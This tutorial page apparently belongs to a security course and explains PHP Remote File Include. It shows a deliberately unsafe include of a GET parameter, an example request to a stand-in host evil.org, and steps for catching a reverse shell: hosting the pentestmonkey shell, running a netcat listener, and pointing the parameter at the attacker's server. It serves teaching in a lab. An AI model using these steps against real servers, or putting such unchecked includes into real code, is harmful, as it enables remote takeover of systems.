Skip to content

RCE: Though Includes

In this article we will look at getting Remote code execution through File Includes attacks. This is dangerous stuff, as if an attacker can get a shell on the server, they can execute any commands.

Remote File Includes

A much more fun version of the local file includes attack, Remote File Includes (RFI) are where the PHP server has been configured to allow users to include items from another site.

This option has now been removed from the default PHP settings, but may still be turned on on older configurations. Additionally, given the popularity of PHP (much like WordPress), there are many conflicting (and possibly dangerous) tutorials out there to get functionality enabled, so it is still worthwhile including.

With RFI we can include files from servers other than the origin. Evidently this makes it much easier for us to get scripts running remotely.

Lets look back at our example from the LFI exploit

<form method="get">
    <div action="examples.php" class="form-group">
        <label for="product">Product</label>
    <select type="text" class="form-control" id="product" name="product">
        <option value="widget.php">Widget</option>
        <option value="gubbins.php">Gubbins</option>
            ....
    </select>
     </div>
     <div class="form-group">
      <button type="submit" class="btn btn-primary">Show Language</button>
     </div>
</form>


<?php
    if (!isset($_GET["product"])){
        include "default.php";
    }
    else{
    include $_GET["product"];
    }
?>

Now this time, our server will accept includes from servers in the wider internet. What might happen if we modify the request to look like this...

http://evil.org/products?product=http://evil.org/test.php

The server tries to load the contents of test.php from the server at evil.org, then include it in the page that is displayed.

If its not clear why displaying a page the attacker has full control of (and can execute scripts on), you are not being paranoid enough.

Note

I have been trolled by trying to upload the php shell script from servers which have PHP enabled. This has ended up in me P0wning myself. Think for a bit about why this would happen. Have a laugh, then be thankful you haven't spent 10+ minutes trying to work out what the hell is happening.

Getting a shell through RFI

Lets move on to the fun stuff....

To Take this attack from concept to exploit we need to:

  1. Grab a shell that we can execute from somewhere
    • google: github pentestmonkey php reverse shell
  2. Read The Full Manual

    • We will need to change some parameters. look for the bit that says CHANGE THIS
    • Also Joking aside, it can be a BadThing(TM) to run any script without checking it first1
  3. Get a web server up and running to host the script python -m SimpleHTTPServer

  4. Get something like a netcat listener ready to catch the shell nc -nvlp 4444

  5. Point the includes parameter at our script http://192.168.3.141/finc/examples.php?lang=http://192.168.3.1:8000

  6. ....
  7. Profit

Video Walkthrough

Task

Work through the task using the Linux Trainer. Its much easier to see how things fit together if you are actually doing it.


  1. (Goldsmith 2010-2020 Collected Rants

Back to top